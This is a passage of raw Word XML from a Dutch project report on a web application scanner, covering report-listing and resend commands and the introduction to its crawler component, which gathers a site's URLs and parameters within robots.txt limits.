              <w:t xml:space="preserve"> rapporten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48AEE12A" w14:textId="1A00D50C" w:rsidR="00312107" w:rsidRDefault="00803273" w:rsidP="00312107">
      <w:r>
        <w:t>Tabel 4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A27D3D" w14:textId="77777777" w:rsidR="00FF173E" w:rsidRDefault="00FF173E" w:rsidP="00FF173E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opties</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2009"/>
        <w:gridCol w:w="1811"/>
        <w:gridCol w:w="4392"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF173E" w14:paraId="5104DBD6" w14:textId="77777777" w:rsidTr="00382E5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EAB7DA1" w14:textId="77777777" w:rsidR="00FF173E" w:rsidRDefault="00FF173E" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63FF559D" w14:textId="77777777" w:rsidR="00FF173E" w:rsidRDefault="00FF173E" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Commando (optie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558456DA" w14:textId="77777777" w:rsidR="00FF173E" w:rsidRDefault="00FF173E" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF173E" w14:paraId="7F469F2E" w14:textId="77777777" w:rsidTr="00382E5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42727722" w14:textId="2D768EE6" w:rsidR="00FF173E" w:rsidRDefault="00382E5B" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C513DC0" w14:textId="14D6B8FA" w:rsidR="00FF173E" w:rsidRDefault="00382E5B" w:rsidP="00B82BA5">
            <w:r>
              <w:t>--nv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13BAC5E5" w14:textId="17EADB92" w:rsidR="00FF173E" w:rsidRDefault="00382E5B" w:rsidP="00B82BA5">
            <w:r>
              <w:t xml:space="preserve">Laat een lijst zien van de niet verzonden rapporten </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ED8CC10" w14:textId="4360D117" w:rsidR="00FF173E" w:rsidRDefault="00FF173E" w:rsidP="00FF173E"/>
    <w:p w14:paraId="72321CFE" w14:textId="77777777" w:rsidR="007E6A2E" w:rsidRDefault="007E6A2E" w:rsidP="007E6A2E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F65F1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lijst Commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F4206" w14:textId="77777777" w:rsidR="007E6A2E" w:rsidRPr="001A5713" w:rsidRDefault="007E6A2E" w:rsidP="007E6A2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66549671" wp14:editId="561C52E1">
            <wp:extent cx="2540000" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270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lijst commando.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2540000" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE49C80" w14:textId="77777777" w:rsidR="007E6A2E" w:rsidRPr="0044486A" w:rsidRDefault="007E6A2E" w:rsidP="007E6A2E">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Produceert een lijst van rapporten die niet zijn verzonden</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3020"/>
        <w:gridCol w:w="3021"/>
        <w:gridCol w:w="3021"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63299" w14:paraId="371272A8" w14:textId="77777777" w:rsidTr="00D63299">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC72AFA" w14:textId="62886CE5" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CC8AE02" w14:textId="26C66B9A" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19C85FDD" w14:textId="251AC7B1" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>Datum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63299" w14:paraId="0CF5A321" w14:textId="77777777" w:rsidTr="00D63299">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C57AE9" w14:textId="0F6B957D" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08091B5C" w14:textId="725B0E3A" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>Rapport-klant-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606B3C50" w14:textId="2A3DC28E" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>11-08-2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63299" w14:paraId="15ABC466" w14:textId="77777777" w:rsidTr="00D63299">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FE934" w14:textId="2D529B20" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34223CEB" w14:textId="7BADED91" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>Rapport-klant-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2087D2B9" w14:textId="4751471C" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>18-08-2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63299" w14:paraId="3A5ED119" w14:textId="77777777" w:rsidTr="00D63299">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799A3194" w14:textId="70BE4D5E" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B6CE145" w14:textId="5A7FC2A5" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>Rapport-klant-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B0ADA21" w14:textId="41A771DD" w:rsidR="00D63299" w:rsidRDefault="00D63299" w:rsidP="00FF173E">
            <w:r>
              <w:t>15-08-2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17A455D0" w14:textId="77777777" w:rsidR="007E6A2E" w:rsidRDefault="007E6A2E" w:rsidP="00FF173E"/>
    <w:p w14:paraId="51E5EA4F" w14:textId="7B911223" w:rsidR="00475057" w:rsidRPr="00475057" w:rsidRDefault="00475057" w:rsidP="00FF173E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475057">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verzend</w:t>
      </w:r>
      <w:r w:rsidR="00E153DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76A6CD" w14:textId="72D97977" w:rsidR="00E153DB" w:rsidRDefault="00E153DB" w:rsidP="00312107">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1550BBE0" wp14:editId="367A2D5E">
            <wp:extent cx="2565400" cy="228600"/>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verzend commando.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2565400" cy="228600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFE989" w14:textId="36493D6B" w:rsidR="00027C46" w:rsidRPr="007E6A2E" w:rsidRDefault="0044486A">
      <w:r>
        <w:t>Verzend rapport met ID 47 opnieuw</w:t>
      </w:r>
      <w:r w:rsidR="00027C46">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C905DA" w14:textId="69597379" w:rsidR="006E3A79" w:rsidRPr="003D45FB" w:rsidRDefault="00161972" w:rsidP="006E3A79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc491022084"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.4.2</w:t>
      </w:r>
      <w:r w:rsidR="00D67CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E3A79" w:rsidRPr="003D45FB">
        <w:t>Crawler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F47B804" w14:textId="0B8E572D" w:rsidR="003459FB" w:rsidRPr="003D45FB" w:rsidRDefault="003459FB" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D45FB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DF37B" w14:textId="1C05435B" w:rsidR="00B46833" w:rsidRDefault="00877D4A" w:rsidP="005A5059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E20DF83" wp14:editId="1EE53B67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1064895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7019925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3787140" cy="170815"/>
                <wp:effectExtent l="0" t="0" r="3810" b="635"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2" name="Tekstvak 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3787140" cy="170815"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="35D59606" w14:textId="613E1C41" w:rsidR="00CE4BB5" w:rsidRPr="00B53A4C" w:rsidRDefault="00CE4BB5" w:rsidP="002A52DB">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 4.10 – werking van een crawler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20DF83" id="_x0000_s1089" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:83.85pt;margin-top:552.75pt;width:298.2pt;height:13.4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E49TQCAABoBAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9sgEH6ftP+AeF8cZ2sTWXGqLFWmSVFb&#10;KZn6TDCOUYFjQGJnv34HjtOt29O0F3zcHQff9915ftdpRU7CeQmmpPloTIkwHCppDiX9tlt/mFHi&#10;AzMVU2BESc/C07vF+3fz1hZiAg2oSjiCRYwvWlvSJgRbZJnnjdDMj8AKg8EanGYBt+6QVY61WF2r&#10;bDIe32YtuMo64MJ79N73QbpI9eta8PBY114EokqKbwtpdWndxzVbzFlxcMw2kl+ewf7hFZpJg5de&#10;S92zwMjRyT9KackdeKjDiIPOoK4lFwkDosnHb9BsG2ZFwoLkeHulyf+/svzh9OSIrEo6ocQwjRLt&#10;xIsPJ/ZCJpGd1voCk7YW00L3GTpUefB7dEbQXe10/CIcgnHk+XzlVnSBcHR+nM6m+ScMcYzl0/Es&#10;v4llstfT1vnwRYAm0SipQ+0Spey08aFPHVLiZR6UrNZSqbiJgZVy5MRQ57aRQVyK/5alTMw1EE/1&#10;BaMnixB7KNEK3b5LhNzcDjj3UJ0RvoO+fbzla4kXbpgPT8xhvyAsnIHwiEutoC0pXCxKGnA//uaP&#10;+SgjRilpsf9K6r8fmROUqK8GBY7NOhhuMPaDYY56BQg1x+myPJl4wAU1mLUD/YyjsYy3YIgZjneV&#10;NAzmKvRTgKPFxXKZkrAlLQsbs7U8lh6I3XXPzNmLLAEFfYChM1nxRp0+t6d5eQxQyyRdJLZn8cI3&#10;tnMS/zJ6cV5+3aes1x/E4icAAAD//wMAUEsDBBQABgAIAAAAIQBYi0gz4gAAAA0BAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUhcEHUS2qRK41TQwq0cWqqe3dgkEfE6sp0m/Xu2J7jt&#10;7I5m3xTryXTsop1vLQqIZxEwjZVVLdYCjl8fz0tgPkhUsrOoBVy1h3V5f1fIXNkR9/pyCDWjEPS5&#10;FNCE0Oec+6rRRvqZ7TXS7ds6IwNJV3Pl5EjhpuNJFKXcyBbpQyN7vWl09XMYjIB064Zxj5un7fF9&#10;Jz/7Ojm9XU9CPD5MrytgQU/hzww3fEKHkpjOdkDlWUc6zTKy0hBHiwUwsmTpPAZ2vq1ekjnwsuD/&#10;W5S/AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB4xOPU0AgAAaAQAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAFiLSDPiAAAADQEAAA8AAAAAAAAA&#10;AAAAAAAAjAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACbBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="35D59606" w14:textId="613E1C41" w:rsidR="00CE4BB5" w:rsidRPr="00B53A4C" w:rsidRDefault="00CE4BB5" w:rsidP="002A52DB">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 4.10 – werking van een crawler</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="458D036A" wp14:editId="6DEBBCCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1004570</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3249295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4064635" cy="3725545"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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awl diagram.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4064635" cy="3725545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006955DC">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006955DC">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006955DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83E39">
        <w:t>behoort</w:t>
      </w:r>
      <w:r w:rsidR="00703892">
        <w:t xml:space="preserve"> tot de kern componenten van een </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00703892">
        <w:t xml:space="preserve"> sc</w:t>
      </w:r>
      <w:r w:rsidR="00490290">
        <w:t>anner</w:t>
      </w:r>
      <w:r w:rsidR="00647F10">
        <w:t xml:space="preserve"> en maakt deel uit van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00647F10">
        <w:t>het</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00647F10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00683639">
        <w:t>projectstructuur</w:t>
      </w:r>
      <w:r w:rsidR="00647F10">
        <w:t xml:space="preserve"> van het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00647F10">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00647F10">
        <w:t xml:space="preserve"> project (H6)</w:t>
      </w:r>
      <w:r w:rsidR="00490290">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C15895">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079581B">
        <w:t>De term “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0079581B">
        <w:t>Crawling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0079581B">
        <w:t xml:space="preserve">” is synoniem worden met de activiteit waarbij data van een website programmatisch wordt verkregen. </w:t>
      </w:r>
      <w:r w:rsidR="0043001C">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0043001C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0043001C">
        <w:t xml:space="preserve"> voorziet de </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="0043001C">
        <w:t xml:space="preserve"> scanner van informatie over de website, dit maakt deze component een essentieel on</w:t>
      </w:r>
      <w:r w:rsidR="0071055D">
        <w:t xml:space="preserve">derdeel van het gehele systeem. </w:t>
      </w:r>
      <w:r w:rsidR="00F7052C">
        <w:t xml:space="preserve">Het is simpel om informatie te verkrijgen over een website, hiervoor dien je geen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F7052C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F7052C">
        <w:t xml:space="preserve"> te implementeren, een simpele </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F7052C">
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F7052C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F7052C">
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F7052C">
        <w:t xml:space="preserve"> is al genoeg om de c</w:t>
      </w:r>
      <w:r w:rsidR="00E0556F">
        <w:t>ontent van een hele website en daarbij ook</w:t>
      </w:r>
      <w:r w:rsidR="00F7052C">
        <w:t xml:space="preserve"> de headers te bemachtigen</w:t>
      </w:r>
      <w:r w:rsidR="002D6DCE">
        <w:t>, dit wordt over het algemee</w:t>
      </w:r>
      <w:r w:rsidR="004A257D">
        <w:t>n gedaan met een HTTP Client die</w:t>
      </w:r>
      <w:r w:rsidR="002D6DCE">
        <w:t xml:space="preserve"> bijna elke programmeer taal </w:t>
      </w:r>
      <w:r w:rsidR="008D7DF2">
        <w:t>native bezit</w:t>
      </w:r>
      <w:r w:rsidR="00F7052C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00206173">
        <w:t xml:space="preserve"> Dit is voor een </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00206173">
        <w:t xml:space="preserve"> sca</w:t>
      </w:r>
      <w:r w:rsidR="00602CE2">
        <w:t xml:space="preserve">nner in praktische opzicht niet specifiek genoeg. </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00602CE2">
        <w:t xml:space="preserve"> scanners verzamelen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00602CE2">
        <w:t>URL links</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00602CE2">
        <w:t xml:space="preserve"> waar zij specifiek naar zoeken op een web pagina, en niet één web pagina maar liever alle web pagina van een gehele website, zover de Robot.txt</w:t>
      </w:r>
      <w:r w:rsidR="00602CE2" w:rsidRPr="00602CE2">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00602CE2">
        <w:t xml:space="preserve"> dat toelaat. </w:t>
      </w:r>
      <w:r w:rsidR="0032735F">
        <w:t xml:space="preserve">De URL’s heeft de </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="0032735F">
        <w:t xml:space="preserve"> nodig om de testen uit te voeren, het liefst ook met de aangekoppelde parameters van een URL erbij. </w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve">Wat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097428C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> vervolgens doet is de data opslaa</w:t>
      </w:r>
      <w:r w:rsidR="00C1233D">
        <w:t xml:space="preserve">n in een </w:t>
      </w:r>
      <w:r w:rsidR="00F67BEF">
        <w:t>datastructuur</w:t>
      </w:r>
      <w:r w:rsidR="00C1233D">
        <w:t xml:space="preserve"> opslag, </w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t>zoa</w:t>
      </w:r>
      <w:r w:rsidR="00C1233D">
